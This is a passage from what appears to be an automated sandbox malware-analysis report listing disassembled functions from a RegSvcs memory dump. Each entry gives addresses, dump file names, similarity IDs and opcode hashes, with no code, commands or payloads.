                                                                                            • Instruction Fuzzy Hash: 6901F2326002099FD7306E51CC85B7A7BA9EF86BE4F041029F78106572CFA5AC82F796
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FFA4B0 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: 21a634253a705f74fcca4926a5aedb2b7fc56aa64a9207f74c4adf40866972d7
                                                                                            • Instruction ID: 1374cb1c78f88c529c15db216f91acc88e2cc30efdc60b1d1260ad5389b5bf6c
                                                                                            • Opcode Fuzzy Hash: 21a634253a705f74fcca4926a5aedb2b7fc56aa64a9207f74c4adf40866972d7
                                                                                            • Instruction Fuzzy Hash: 8D017836500109ABCF129F84DC40AEA3BA6EB4C764F098101FE1866224C676D960EB81
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FF6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: e651be3b5ec3f6a1e61705edc10640ce1603b2db11a60bc838fd6f58bed84b4f
                                                                                            • Instruction ID: 71d0525b28baa521021b58f37e9d568c643187cb42d44a999974e5a1266a23a2
                                                                                            • Opcode Fuzzy Hash: e651be3b5ec3f6a1e61705edc10640ce1603b2db11a60bc838fd6f58bed84b4f
                                                                                            • Instruction Fuzzy Hash: ED9171B2A00219AFEB21DB95CD85FEE77B8EF45B50F140065F600FB1A1DA75AD04DBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FA8402 Relevance: 1.5, Strings: 1, Instructions: 263COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @
                                                                                            • API String ID: 0-2766056989
                                                                                            • Opcode ID: 9553090470211788c14c0b99d7501db718ae233e192633ad285a2d0c5453fa40
                                                                                            • Instruction ID: 4583a6598cf770ee1639eb142ed1bf1caa08d26a56620ea87ec1bc778ab53eee
                                                                                            • Opcode Fuzzy Hash: 9553090470211788c14c0b99d7501db718ae233e192633ad285a2d0c5453fa40
                                                                                            • Instruction Fuzzy Hash: E691B1B1908340AFD721EF21CC41FABBBE8BF85794F44492DFA8492051DB78D905EB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0101E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: 9fa32ccb83c85c70ad26febf24b0637d30703f5a0530c6fe32724cb9e310e80b
                                                                                            • Instruction ID: 3e10a7ca2778cf83637cdae399ebea9a90ad2c26439c201730038eb94b8e8106
                                                                                            • Opcode Fuzzy Hash: 9fa32ccb83c85c70ad26febf24b0637d30703f5a0530c6fe32724cb9e310e80b
                                                                                            • Instruction Fuzzy Hash: 7091CE71900608BFDB23ABA4DC55FEFBBB9EF85740F100029F941A7251DB799901DB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FA273C Relevance: 1.5, Strings: 1, Instructions: 249COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .Local
                                                                                            • API String ID: 0-5346580
                                                                                            • Opcode ID: 1825b44e963fe7fbe882d4aade4cccd9198b98a37e67131eed34d3955fa63e8a
                                                                                            • Instruction ID: 5d026474494d9745bdbff5dbdc1a50f7cbc0176c5c68391b3894f12e3d844405
                                                                                            • Opcode Fuzzy Hash: 1825b44e963fe7fbe882d4aade4cccd9198b98a37e67131eed34d3955fa63e8a
                                                                                            • Instruction Fuzzy Hash: 78A1E471E00229DBDB64CF69CC84BA9B3B4BF59724F2441E9E908A7251D7349E80EF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F6A197 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: \??\
                                                                                            • API String ID: 0-3047946824
                                                                                            • Opcode ID: 227570bc4c620c0a4969862ed281b4c5dbabda70478e8f40ce56b1be0490d71f
                                                                                            • Instruction ID: ef43c1a8aa1ea4153d03c27114c8df10d12769c01c724e14a35cda19cf6cbd9d
                                                                                            • Opcode Fuzzy Hash: 227570bc4c620c0a4969862ed281b4c5dbabda70478e8f40ce56b1be0490d71f
                                                                                            • Instruction Fuzzy Hash: 67A16971D1122A9BDB31DB24CD99BEAB7B8EF44710F1041EAE90CA7250D7399E84DF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FA8620 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 8
                                                                                            • API String ID: 0-4194326291
                                                                                            • Opcode ID: 905d3c58330d402f2dbd4fd15e0818cb1d5efc436747825aa7ca25239e5fd52f
                                                                                            • Instruction ID: f937d6a7722a1e6d5b36b741c7b87da46b4ad9c054815362ba9eca10b8e1b039
                                                                                            • Opcode Fuzzy Hash: 905d3c58330d402f2dbd4fd15e0818cb1d5efc436747825aa7ca25239e5fd52f
                                                                                            • Instruction Fuzzy Hash: 9881BFB1E00748AFDB20CF95C841BAEBBB5FB08B58F244119FA05B7280D7B5AD45EB51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 010143D4 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @
                                                                                            • API String ID: 0-2766056989
                                                                                            • Opcode ID: 8cccacd4a67fef7d34f9f62c00f3ad3d834ab738e898b9184a8411358a012ed9
                                                                                            • Instruction ID: cd59c8b4defa8b4d2cfa11890ad8bdf71cd62684866cf7fd1fcef1da091e8610
                                                                                            • Opcode Fuzzy Hash: 8cccacd4a67fef7d34f9f62c00f3ad3d834ab738e898b9184a8411358a012ed9
                                                                                            • Instruction Fuzzy Hash: 485139B1E0021DAFDF11DFA9CC81AEEBBB8EB48754F100529E611F7291DB399905CB60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F6A580 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (
                                                                                            • API String ID: 0-3887548279
                                                                                            • Opcode ID: fe26feca91da7c8547d660df04d669ca321089cb445d84e668099b4872340d66
                                                                                            • Instruction ID: 7c3b71d40008f6645105ffa5f372b48f24a71f762b80ec112588ad9b876d84b0
                                                                                            • Opcode Fuzzy Hash: fe26feca91da7c8547d660df04d669ca321089cb445d84e668099b4872340d66
                                                                                            • Instruction Fuzzy Hash: F55108B1D1165ADFCB11CF99C980A8DBBF4FF08714F14826AE408AB241D7749951DF94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F72140 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (
                                                                                            • API String ID: 0-3887548279
                                                                                            • Opcode ID: 5138efabd0c822361e91ca04f3b255f20066c21857fe022756c17aa91312fbae
                                                                                            • Instruction ID: a547a3d30f307a097fe8b645366591b5aca74520d7a8246346ea2ae1a4a250ec
                                                                                            • Opcode Fuzzy Hash: 5138efabd0c822361e91ca04f3b255f20066c21857fe022756c17aa91312fbae
                                                                                            • Instruction Fuzzy Hash: A7514DB1D0161AEFDB50CF99C98068DFBB1FF08720F50822EE818A7681C374A951DBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0102C188 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @
                                                                                            • API String ID: 0-2766056989
                                                                                            • Opcode ID: 9baa6cbc5fb20a5f009e7df1b21861a78372d13141c09e94006c3b31c2163720
                                                                                            • Instruction ID: 355bd0f4cb642b6024c675f575ad8a05fb5f3bb4d67add4bf6598967b8c18bf9
                                                                                            • Opcode Fuzzy Hash: 9baa6cbc5fb20a5f009e7df1b21861a78372d13141c09e94006c3b31c2163720
                                                                                            • Instruction Fuzzy Hash: A441B271E00219EBEF11DAD8CD41FEEBBF8AB15704F04406AEA49B7280DB749E088B50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01004144 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @
                                                                                            • API String ID: 0-2766056989
                                                                                            • Opcode ID: e3cf4a7a001f70082d33007e21d706de7e14f1d84091c85d1bdc6df3d10d40b9
                                                                                            • Instruction ID: 21a3fa241df5fa1a305e1c8801b90e76929a79f1d2e0b0a24aec31aab7cc0670
                                                                                            • Opcode Fuzzy Hash: e3cf4a7a001f70082d33007e21d706de7e14f1d84091c85d1bdc6df3d10d40b9
                                                                                            • Instruction Fuzzy Hash: F041E372A042488BFB22EB99CC41BEDBBF4EF45740F140499EA81EB7D2D7389901CB15
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FAC6A6 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: minkernel\ntdll\ldrredirect.c
                                                                                            • API String ID: 0-3694840737
                                                                                            • Opcode ID: b0c5b15ab04f8470ef5372cabfec2e5b8d2f2208a134cb96d3e0f9504d9a5b4a
                                                                                            • Instruction ID: d38b177581bf6e8251bd2f7f1afee35b2acb8cd4320d1e8ec37273dc4a387a46
                                                                                            • Opcode Fuzzy Hash: b0c5b15ab04f8470ef5372cabfec2e5b8d2f2208a134cb96d3e0f9504d9a5b4a
                                                                                            • Instruction Fuzzy Hash: B73129B17447459FD220FF29DD46E2A7794FF81B50F040528F984AB392EA28EC05E7E2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01006B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #
                                                                                            • API String ID: 0-1885708031
                                                                                            • Opcode ID: a3aa68492fb2e1c3a73ddb7a8685678bd0911017b10c1945e5d33be3303d7b01
                                                                                            • Instruction ID: 61a2cd2f861f0a68a08872c7e31cc8702607bf9d2a03a87c94699ea12a28aba1
                                                                                            • Opcode Fuzzy Hash: a3aa68492fb2e1c3a73ddb7a8685678bd0911017b10c1945e5d33be3303d7b01
                                                                                            • Instruction Fuzzy Hash: 0331D131A006199AFB23DA69C850FEA7BA9DF05704F144068E981AB2C2CB6AE955CB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F829A0 Relevance: 1.0, Instructions: 966COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b367a01b97af68a6a8fb5e341076f66a7cb8515c956afd3755d43f62d133fb74
                                                                                            • Instruction ID: 2ba5eea66dcc042ac47b30792758202e0e57c1e83e46f5c6e20ad8dd055149c0
                                                                                            • Opcode Fuzzy Hash: b367a01b97af68a6a8fb5e341076f66a7cb8515c956afd3755d43f62d133fb74
                                                                                            • Instruction Fuzzy Hash: 1792BC71E042489FDB25DF68C844BEEBBF1FF48714F18805AE845AB251D739AA41EF50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F7C7C0 Relevance: 1.0, Instructions: 960COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fe64a52ae1de536c01ef64bad9f58167714dbc6fe572b350b71ccb1058a163bb
                                                                                            • Instruction ID: 1eec9cde4824a16cad0462f87d14edc134e0bbdf9022af64b532d2f1ca6d2fc9
                                                                                            • Opcode Fuzzy Hash: fe64a52ae1de536c01ef64bad9f58167714dbc6fe572b350b71ccb1058a163bb
                                                                                            • Instruction Fuzzy Hash: A8825C75E002188BDB24CFA9C880BEDB7B5BF48310F54C16AE85DAB351D7349D81EB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01012000 Relevance: .8, Instructions: 757COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7731edbfdc18f47e86477d224a75650a348d1631f5c39b9b980638cd4418ea13
                                                                                            • Instruction ID: a215a506b1225933ff4e5b4d8fa4e20d90ea8d9deb5c337929888602fffc823c
                                                                                            • Opcode Fuzzy Hash: 7731edbfdc18f47e86477d224a75650a348d1631f5c39b9b980638cd4418ea13
                                                                                            • Instruction Fuzzy Hash: EE42F3316083419FE765DF68C890A6FBBE5BF88700F28096DFAC297259D738D845CB52
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01008158 Relevance: .6, Instructions: 617COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 17c2af8b3fdd7328168a311cbd7eb06e57413a805beed2c4f398df1e0f66339a
